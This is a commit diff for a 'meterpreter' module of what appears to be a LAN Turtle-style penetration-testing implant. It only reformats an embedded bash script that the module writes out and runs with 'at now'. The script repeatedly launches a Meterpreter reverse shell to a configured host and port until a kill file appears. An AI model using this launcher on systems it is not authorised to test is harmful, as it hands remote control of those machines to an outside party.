Improve formatting on executable

diff --git a/modules/meterpreter b/modules/meterpreter
--- a/modules/meterpreter
+++ b/modules/meterpreter
@@ -23,25 +23,25 @@ function start {
         touch /etc/turtle/meterpreter/meterpreter_exec
         chmod +x /etc/turtle/meterpreter/meterpreter_exec
 
-        echo '''#!/bin/bash
-        rm /tmp/killmeterpreter
-        DATE=$(date)
-        IP=$(uci get meterpreter.host)
-        PORT=$(uci get meterpreter.port)
-        DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-        [[ "$IP" == "" || "$PORT" == "" ]] && {
-        logger "Meterpreter: Error, configuration blank"
-        echo "Meterpreter: Error, configuration blank"
-        } || {
-        while [ ! -f /tmp/killmeterpreter ]; do
-        echo "Started Meterpreter at $DATE with $IP $PORT"
-        logger "Meterpreter: Started at $DATE with $IP $PORT"
-        /usr/bin/meterpreter $IP $PORT
-        done
-        rm /tmp/killmeterpreter
-        echo "Stopped Meterpreter at $DATE with $IP $PORT"
-        logger "Meterpreter: Stopped at $DATE with $IP $PORT"
-        }''' > /etc/turtle/meterpreter/meterpreter_exec
+echo '''#!/bin/bash
+rm /tmp/killmeterpreter
+DATE=$(date)
+IP=$(uci get meterpreter.host)
+PORT=$(uci get meterpreter.port)
+DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+[[ "$IP" == "" || "$PORT" == "" ]] && {
+logger "Meterpreter: Error, configuration blank"
+echo "Meterpreter: Error, configuration blank"
+} || {
+while [ ! -f /tmp/killmeterpreter ]; do
+echo "Started Meterpreter at $DATE with $IP $PORT"
+logger "Meterpreter: Started at $DATE with $IP $PORT"
+/usr/bin/meterpreter $IP $PORT
+done
+rm /tmp/killmeterpreter
+echo "Stopped Meterpreter at $DATE with $IP $PORT"
+logger "Meterpreter: Stopped at $DATE with $IP $PORT"
+}''' > /etc/turtle/meterpreter/meterpreter_exec
 
         echo "/etc/turtle/meterpreter/meterpreter_exec" | at now
         echo "Stageless Meterpreter started with pid:"
